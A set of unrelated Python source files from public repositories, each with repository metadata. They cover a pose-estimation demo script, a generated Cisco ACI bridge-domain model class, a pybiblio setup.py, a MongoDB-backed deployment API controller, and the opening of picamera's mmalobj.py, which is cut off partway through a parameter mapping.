| permissive | qybing/tf-pose-estimation | 302550e74d457edea178b8e36a9cd58c1cbe89e8 | 9adc3d4bf1c87fba4df977b83cee8e656882fe15 | refs/heads/master | 2023-04-10T08:59:08.778691 | 2019-06-19T06:11:49 | 2019-06-19T06:11:49 | 189,166,320 | 0 | 0 | Apache-2.0 | 2023-03-25T00:06:18 | 2019-05-29T06:44:17 | PureBasic | UTF-8 | Python | false | false | 3,518 | py | import argparse
import logging
import sys
import time
from tf_pose import common
import cv2
import numpy as np
from tf_pose.estimator import TfPoseEstimator
from tf_pose.networks import get_graph_path, model_wh
# Module logger: DEBUG-level stream handler with a timestamped format.
# Existing handlers are cleared first so re-importing does not duplicate output.
logger = logging.getLogger('TfPoseEstimatorRun')
logger.handlers.clear()
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
if __name__ == '__main__':
    # ---- Command-line arguments ----------------------------------------
    parser = argparse.ArgumentParser(description='tf-pose-estimation run')
    parser.add_argument('--image', type=str, default='./images/p1.jpg')
    parser.add_argument('--model', type=str, default='mobilenet_thin',
                        help='cmu / mobilenet_thin / mobilenet_v2_large / mobilenet_v2_small')
    parser.add_argument('--resize', type=str, default='0x0',
                        help='if provided, resize images before they are processed. '
                             'default=0x0, Recommends : 432x368 or 656x368 or 1312x736 ')
    parser.add_argument('--resize-out-ratio', type=float, default=4.0,
                        help='if provided, resize heatmaps before they are post-processed. default=1.0')
    args = parser.parse_args()

    # Build the pose estimator. When no explicit --resize was given (0x0),
    # fall back to the default 432x368 network input size.
    # NOTE: renamed from ``e`` — the original name was shadowed (and, in
    # Python 3, deleted) by ``except Exception as e`` further below.
    w, h = model_wh(args.resize)
    if w == 0 or h == 0:
        estimator = TfPoseEstimator(get_graph_path(args.model), target_size=(432, 368))
    else:
        estimator = TfPoseEstimator(get_graph_path(args.model), target_size=(w, h))

    # Estimate human poses from a single image.
    image = common.read_imgfile(args.image, None, None)
    if image is None:
        logger.error('Image can not be read, path=%s' % args.image)
        sys.exit(-1)

    t = time.time()
    humans = estimator.inference(image, resize_to_default=(w > 0 and h > 0),
                                 upsample_size=args.resize_out_ratio)
    elapsed = time.time() - t
    logger.info('inference image: %s in %.4f seconds.' % (args.image, elapsed))

    # Draw the detected skeletons onto the image in place.
    image = TfPoseEstimator.draw_humans(image, humans, imgcopy=False)

    try:
        import matplotlib.pyplot as plt

        fig = plt.figure()
        a = fig.add_subplot(2, 2, 1)
        a.set_title('Result')
        plt.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))

        bgimg = cv2.cvtColor(image.astype(np.uint8), cv2.COLOR_BGR2RGB)
        bgimg = cv2.resize(bgimg, (estimator.heatMat.shape[1], estimator.heatMat.shape[0]),
                           interpolation=cv2.INTER_AREA)

        # Show the network's heatmap output overlaid on the image.
        a = fig.add_subplot(2, 2, 2)
        plt.imshow(bgimg, alpha=0.5)
        tmp = np.amax(estimator.heatMat[:, :, :-1], axis=2)
        plt.imshow(tmp, cmap=plt.cm.gray, alpha=0.5)
        plt.colorbar()

        # Part-affinity fields: odd channels are x components, even are y.
        tmp2 = estimator.pafMat.transpose((2, 0, 1))
        tmp2_odd = np.amax(np.absolute(tmp2[::2, :, :]), axis=0)
        tmp2_even = np.amax(np.absolute(tmp2[1::2, :, :]), axis=0)

        a = fig.add_subplot(2, 2, 3)
        a.set_title('Vectormap-x')
        plt.imshow(tmp2_odd, cmap=plt.cm.gray, alpha=0.5)
        plt.colorbar()

        a = fig.add_subplot(2, 2, 4)
        a.set_title('Vectormap-y')
        plt.imshow(tmp2_even, cmap=plt.cm.gray, alpha=0.5)
        plt.colorbar()
        plt.show()
    except Exception as exc:
        # Plotting is best-effort; any matplotlib failure is only logged.
        # (Fixed typo in the original message: 'matplitlib' -> 'matplotlib'.)
        logger.warning('matplotlib error, %s' % exc)

    cv2.imshow('result', image)
    cv2.waitKey()
| [
"[email protected]"
]
| |
f7069d0de200d1883e7840ebfcdab0ad60192a08 | 3c000380cbb7e8deb6abf9c6f3e29e8e89784830 | /venv/Lib/site-packages/cobra/modelimpl/fv/abd.py | 3dd4529c22f77fef93c0dbd871cbccde845e5b30 | []
| no_license | bkhoward/aciDOM | 91b0406f00da7aac413a81c8db2129b4bfc5497b | f2674456ecb19cf7299ef0c5a0887560b8b315d0 | refs/heads/master | 2023-03-27T23:37:02.836904 | 2021-03-26T22:07:54 | 2021-03-26T22:07:54 | 351,855,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,840 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class ABD(Mo):
meta = ClassMeta("cobra.model.fv.ABD")
meta.isAbstract = True
meta.moClassName = "fvABD"
meta.moClassName = "fvABD"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "None"
meta.writeAccessMask = 0x0
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = False
meta.isConfigurable = True
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.superClasses.add("cobra.model.fv.L2Dom")
meta.superClasses.add("cobra.model.fv.Def")
meta.superClasses.add("cobra.model.pol.DefRoot")
meta.superClasses.add("cobra.model.fv.Dom")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Def")
meta.concreteSubClasses.add("cobra.model.fv.SvcBD")
meta.concreteSubClasses.add("cobra.model.fv.BD")
meta.concreteSubClasses.add("cobra.model.fv.BDDef")
meta.rnPrefixes = [
]
prop = PropMeta("str", "OptimizeWanBandwidth", "OptimizeWanBandwidth", 34472, PropCategory.REGULAR)
prop.label = "Optimize Wan Bandwidth between sites"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("OptimizeWanBandwidth", prop)
prop = PropMeta("str", "arpFlood", "arpFlood", 1693, PropCategory.REGULAR)
prop.label = "ARP Flooding"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("arpFlood", prop)
prop = PropMeta("str", "bcastP", "bcastP", 1691, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("bcastP", prop)
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "configIssues", "configIssues", 26448, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "ok"
prop._addConstant("FHS-enabled-on-l2-only-bd", "first-hop-security-enabled-on-layer-2-only-bridge-domain", 2)
prop._addConstant("igmp-snoop-disabled-on-multicast-if", "igmpsnoop-disabled-on-multicast-enabled-bd", 1)
prop._addConstant("ok", "ok", 0)
meta.props.add("configIssues", prop)
prop = PropMeta("str", "descr", "descr", 5614, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "epClear", "epClear", 31106, PropCategory.REGULAR)
prop.label = "Clear Endpoints"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("epClear", prop)
prop = PropMeta("str", "epMoveDetectMode", "epMoveDetectMode", 19110, PropCategory.REGULAR)
prop.label = "EP Move Detection Mode"
prop.isConfig = True
prop.isAdmin = True
prop._addConstant("garp", "garp-based-detection", 1)
meta.props.add("epMoveDetectMode", prop)
prop = PropMeta("str", "intersiteBumTrafficAllow", "intersiteBumTrafficAllow", 30545, PropCategory.REGULAR)
prop.label = "Allow BUM traffic between sites"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("intersiteBumTrafficAllow", prop)
prop = PropMeta("str", "intersiteL2Stretch", "intersiteL2Stretch", 33178, PropCategory.REGULAR)
prop.label = "Allow l2Stretch between sites"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("intersiteL2Stretch", prop)
prop = PropMeta("str", "ipLearning", "ipLearning", 21254, PropCategory.REGULAR)
prop.label = "Ip Learning"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = True
prop.defaultValueStr = "yes"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("ipLearning", prop)
prop = PropMeta("str", "ipv6McastAllow", "ipv6McastAllow", 47406, PropCategory.REGULAR)
prop.label = "ipv6 Multicast Allow"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("ipv6McastAllow", prop)
prop = PropMeta("str", "limitIpLearnToSubnets", "limitIpLearnToSubnets", 20851, PropCategory.REGULAR)
prop.label = "Limit IP learning to BD subnets only"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = True
prop.defaultValueStr = "yes"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("limitIpLearnToSubnets", prop)
prop = PropMeta("str", "llAddr", "llAddr", 16876, PropCategory.REGULAR)
prop.label = "IPv6 Link Local Address"
prop.isConfig = True
prop.isAdmin = True
meta.props.add("llAddr", prop)
prop = PropMeta("str", "mac", "mac", 1698, PropCategory.REGULAR)
prop.label = "MAC Address"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = 280487012409856
prop.defaultValueStr = "00:22:BD:F8:19:FF"
meta.props.add("mac", prop)
prop = PropMeta("str", "mcastAllow", "mcastAllow", 24916, PropCategory.REGULAR)
prop.label = "Multicast Allow"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("mcastAllow", prop)
prop = PropMeta("str", "mtu", "mtu", 1697, PropCategory.REGULAR)
prop.label = "MTU Size"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(576, 9216)]
prop.defaultValue = 1
prop.defaultValueStr = "inherit"
prop._addConstant("inherit", "inherit", 1)
meta.props.add("mtu", prop)
prop = PropMeta("str", "multiDstPktAct", "multiDstPktAct", 18026, PropCategory.REGULAR)
prop.label = "Multi Destination Packet Action"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "bd-flood"
prop._addConstant("bd-flood", "flood-in-bd", 0)
prop._addConstant("drop", "drop", 2)
prop._addConstant("encap-flood", "flood-in-encapsulation", 1)
meta.props.add("multiDstPktAct", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerKey", prop)
prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerTag", prop)
prop = PropMeta("str", "pcTag", "pcTag", 1695, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("any", "any", 0)
meta.props.add("pcTag", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "scope", "scope", 1694, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 16777215)]
prop.defaultValue = 0
prop.defaultValueStr = "0"
meta.props.add("scope", prop)
prop = PropMeta("str", "seg", "seg", 1766, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("seg", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "unicastRoute", "unicastRoute", 1692, PropCategory.REGULAR)
prop.label = "Unicast Routing"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = True
prop.defaultValueStr = "yes"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("unicastRoute", prop)
prop = PropMeta("str", "unkMacUcastAct", "unkMacUcastAct", 1696, PropCategory.REGULAR)
prop.label = "Unknown Mac Unicast Action"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = 1
prop.defaultValueStr = "proxy"
prop._addConstant("flood", "flood", 0)
prop._addConstant("proxy", "hardware-proxy", 1)
meta.props.add("unkMacUcastAct", prop)
prop = PropMeta("str", "unkMcastAct", "unkMcastAct", 16164, PropCategory.REGULAR)
prop.label = "Unknown Multicast Destination Action"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "flood"
prop._addConstant("flood", "flood", 0)
prop._addConstant("opt-flood", "optimized-flood", 1)
meta.props.add("unkMcastAct", prop)
prop = PropMeta("str", "v6unkMcastAct", "v6unkMcastAct", 47702, PropCategory.REGULAR)
prop.label = "Unknown V6 Multicast Destination Action"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "flood"
prop._addConstant("flood", "flood", 0)
prop._addConstant("opt-flood", "optimized-flood", 1)
meta.props.add("v6unkMcastAct", prop)
prop = PropMeta("str", "vmac", "vmac", 21204, PropCategory.REGULAR)
prop.label = "Virtual MAC Address"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "not-applicable"
prop._addConstant("not-applicable", "not-configured", 0)
meta.props.add("vmac", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
]
| |
bd94282c6683da22e869c64a0dd76f5ba27d7158 | 35c1dcb0c8a713725a8d9d3062df26b096a4c150 | /setup.py | 295d74e177fe1a2cc941145ea359d2970b74527a | [
"MIT"
]
| permissive | ijgarcesc/pybiblio | 84fc78c09866a65bd13945ab36c8841587d74f09 | 02428eba8c4fcef3f9311ca9ba7be6bab661ca9e | refs/heads/master | 2021-07-15T07:40:08.319875 | 2017-10-18T13:57:08 | 2017-10-18T13:57:08 | 105,827,028 | 0 | 0 | null | 2017-10-04T22:48:12 | 2017-10-04T22:48:12 | null | UTF-8 | Python | false | false | 899 | py | from setuptools import setup
def readme():
    """Return the full text of README.md as a single string."""
    readme_file = open('README.md')
    try:
        return readme_file.read()
    finally:
        readme_file.close()
# Package metadata / setuptools entry point.
# NOTE(review): ``packages=['pybibio']`` does not match ``name='pybiblio'``
# (and the GitHub URL); this looks like a typo unless the source directory is
# really named "pybibio" — confirm against the repository layout.
setup(name='pybiblio',
      version='0.0.0',
      description='Analysis of bibliographic information using python',
      long_description='A tool for creating and gradding assignments in the Jupyter Notebook using the Virtual Programming Lab plugging and Moodle',
      classifiers=[
          'Development Status :: 3 - Alpha',
          'License :: OSI Approved :: MIT License',
          'Programming Language :: Python :: 3.5',
          'Intended Audience :: Education',
          'License :: Free For Educational Use',
      ],
      keywords='Scopus',
      url='http://github.com/jdvelasq/pybiblio',
      author='Juan D. Velasquez, Johana Garces',
      author_email='[email protected]',
      license='MIT',
      packages=['pybibio'],
      include_package_data=True,
      zip_safe=False)
| [
"[email protected]"
]
| |
3245b49aa803d9fd7eaad75b78856c0dd540cbf0 | 1d4adeca605818749247235dba11a90fbc154748 | /deprecated/services/deployment/deployment_controller.py | 6ccff0b553fb38655e4e8f6737b142ce9a9a71f7 | [
"Apache-2.0"
]
| permissive | joshish-iu/cloudmesh-nist | 4598cd884fb9faaef5ea5cc5fa3e3920dbc6ebff | c26952859c2230231420058f6c488c9f6cc73218 | refs/heads/master | 2020-05-26T13:11:51.730994 | 2019-05-21T10:42:28 | 2019-05-21T10:42:28 | 188,243,290 | 0 | 0 | NOASSERTION | 2019-05-23T13:48:49 | 2019-05-23T13:48:48 | null | UTF-8 | Python | false | false | 905 | py | import connexion
import six
#from deployment_controller import *
from swagger_server.models.deployment import Deployment # noqa: E501
from swagger_server import util
from pymongo import MongoClient
# Module-level MongoDB handles: local server, database 'cm',
# collection 'deployment' shared by all controller functions below.
client = MongoClient()
db = client['cm']
deployments = db['deployment']
def get_deployment():
    """Return every stored deployment as a list of dicts.

    The MongoDB ``_id`` field is projected out of each document.
    """
    all_docs = deployments.find({}, {'_id': False})
    return list(all_docs)
def add_deployment(deployment=None):
    """Persist a deployment document and echo it back to the caller.

    When the request body is JSON it is deserialized into a ``Deployment``
    model before being stored in the ``deployments`` collection.
    """
    if connexion.request.is_json:
        deployment = Deployment.from_dict(deployment)
    # ``Collection.insert`` is deprecated (removed in pymongo 4);
    # ``insert_one`` is the supported single-document equivalent.
    deployments.insert_one(deployment.to_dict())
    return deployment
def get_deployment_by_name(name):
    """Return (name, description, value, kind) for the first matching deployment.

    Returns None when no deployment with the given name exists.
    """
    # BUG (pre-existing): uniqueness of ``name`` is not guaranteed; like the
    # original loop, this returns the first document in natural order.
    doc = deployments.find_one({'name': name})
    if doc is None:
        return None
    return (doc['name'],
            doc['description'],
            doc['value'],
            doc['kind'])
| [
"[email protected]"
]
| |
d8482c372930f5b396b0f84fea8ef886b2b2b545 | 948205e4d3bbe2200ca41ffc4f450ee96948b50f | /picamera/mmalobj.py | ec167f2f6d6e24dfa2b1bba876addbc6c496c0e7 | [
"BSD-3-Clause"
]
| permissive | TheSpaghettiDetective/picamera | 1a875dec7f616db059034317dee7b38060149253 | f7b9dcc66224d12ff5a22ece61d76cace2376749 | refs/heads/master | 2022-11-24T12:58:12.932558 | 2020-07-28T18:39:26 | 2020-07-28T18:39:26 | 283,290,128 | 2 | 1 | BSD-3-Clause | 2020-07-28T18:05:32 | 2020-07-28T18:05:32 | null | UTF-8 | Python | false | false | 150,486 | py | # vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python header conversion
# Copyright (c) 2013-2017 Dave Jones <[email protected]>
#
# Original headers
# Copyright (c) 2012, Broadcom Europe Ltd
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's
str = type('')
import io
import ctypes as ct
import warnings
import weakref
from threading import Thread, Event
from collections import namedtuple
from fractions import Fraction
from itertools import cycle
from functools import reduce
from operator import mul
from . import bcm_host, mmal
from .streams import BufferIO
from .exc import (
mmal_check,
PiCameraValueError,
PiCameraRuntimeError,
PiCameraMMALError,
PiCameraPortDisabled,
PiCameraDeprecated,
)
# Old firmwares confuse the RGB24 and BGR24 encodings. This flag tracks whether
# the order needs fixing (it is set during MMALCamera.__init__).
# None means "not yet determined".
FIX_RGB_BGR_ORDER = None
# Mapping of parameters to the C-structure they expect / return. If a parameter
# does not appear in this mapping, it cannot be queried / set with the
# MMALControlPort.params attribute.
PARAM_TYPES = {
mmal.MMAL_PARAMETER_ALGORITHM_CONTROL: mmal.MMAL_PARAMETER_ALGORITHM_CONTROL_T,
mmal.MMAL_PARAMETER_ANNOTATE: None, # adjusted by MMALCamera.annotate_rev
mmal.MMAL_PARAMETER_ANTISHAKE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET: mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET_T,
mmal.MMAL_PARAMETER_AWB_MODE: mmal.MMAL_PARAMETER_AWBMODE_T,
mmal.MMAL_PARAMETER_BRIGHTNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_BUFFER_FLAG_FILTER: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS: mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS_T,
mmal.MMAL_PARAMETER_CAMERA_BURST_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE: mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE_T,
mmal.MMAL_PARAMETER_CAMERA_CONFIG: mmal.MMAL_PARAMETER_CAMERA_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_CUSTOM_SENSOR_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_INFO: None, # adjusted by MMALCameraInfo.info_rev
mmal.MMAL_PARAMETER_CAMERA_INTERFACE: mmal.MMAL_PARAMETER_CAMERA_INTERFACE_T,
mmal.MMAL_PARAMETER_CAMERA_ISP_BLOCK_OVERRIDE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_MIN_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_NUM: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG: mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_RX_TIMING: mmal.MMAL_PARAMETER_CAMERA_RX_TIMING_T,
mmal.MMAL_PARAMETER_CAMERA_SETTINGS: mmal.MMAL_PARAMETER_CAMERA_SETTINGS_T,
mmal.MMAL_PARAMETER_CAMERA_USE_CASE: mmal.MMAL_PARAMETER_CAMERA_USE_CASE_T,
mmal.MMAL_PARAMETER_CAPTURE_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_MODE: mmal.MMAL_PARAMETER_CAPTUREMODE_T,
mmal.MMAL_PARAMETER_CAPTURE_STATS_PASS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_STATUS: mmal.MMAL_PARAMETER_CAPTURE_STATUS_T,
mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST: mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST_T,
mmal.MMAL_PARAMETER_CLOCK_ACTIVE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_ENABLE_BUFFER_INFO: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_LATENCY: mmal.MMAL_PARAMETER_CLOCK_LATENCY_T,
mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_SCALE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_TIME: mmal.MMAL_PARAMETER_INT64_T,
mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD_T,
mmal.MMAL_PARAMETER_COLOUR_EFFECT: mmal.MMAL_PARAMETER_COLOURFX_T,
mmal.MMAL_PARAMETER_CONTRAST: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CORE_STATISTICS: mmal.MMAL_PARAMETER_CORE_STATISTICS_T,
mmal.MMAL_PARAMETER_CUSTOM_AWB_GAINS: mmal.MMAL_PARAMETER_AWB_GAINS_T,
mmal.MMAL_PARAMETER_DISPLAYREGION: mmal.MMAL_DISPLAYREGION_T,
mmal.MMAL_PARAMETER_DPF_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_DYNAMIC_RANGE_COMPRESSION: mmal.MMAL_PARAMETER_DRC_T,
mmal.MMAL_PARAMETER_ENABLE_RAW_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF: mmal.MMAL_PARAMETER_EXIF_T,
mmal.MMAL_PARAMETER_EXP_METERING_MODE: mmal.MMAL_PARAMETER_EXPOSUREMETERINGMODE_T,
mmal.MMAL_PARAMETER_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_EXPOSURE_MODE: mmal.MMAL_PARAMETER_EXPOSUREMODE_T,
mmal.MMAL_PARAMETER_EXTRA_BUFFERS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_FIELD_OF_VIEW: mmal.MMAL_PARAMETER_FIELD_OF_VIEW_T,
mmal.MMAL_PARAMETER_FLASH: mmal.MMAL_PARAMETER_FLASH_T,
mmal.MMAL_PARAMETER_FLASH_REQUIRED: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_FLASH_SELECT: mmal.MMAL_PARAMETER_FLASH_SELECT_T,
mmal.MMAL_PARAMETER_FLICKER_AVOID: mmal.MMAL_PARAMETER_FLICKERAVOID_T,
mmal.MMAL_PARAMETER_FOCUS: mmal.MMAL_PARAMETER_FOCUS_T,
mmal.MMAL_PARAMETER_FOCUS_REGIONS: mmal.MMAL_PARAMETER_FOCUS_REGIONS_T,
mmal.MMAL_PARAMETER_FOCUS_STATUS: mmal.MMAL_PARAMETER_FOCUS_STATUS_T,
mmal.MMAL_PARAMETER_FPS_RANGE: mmal.MMAL_PARAMETER_FPS_RANGE_T,
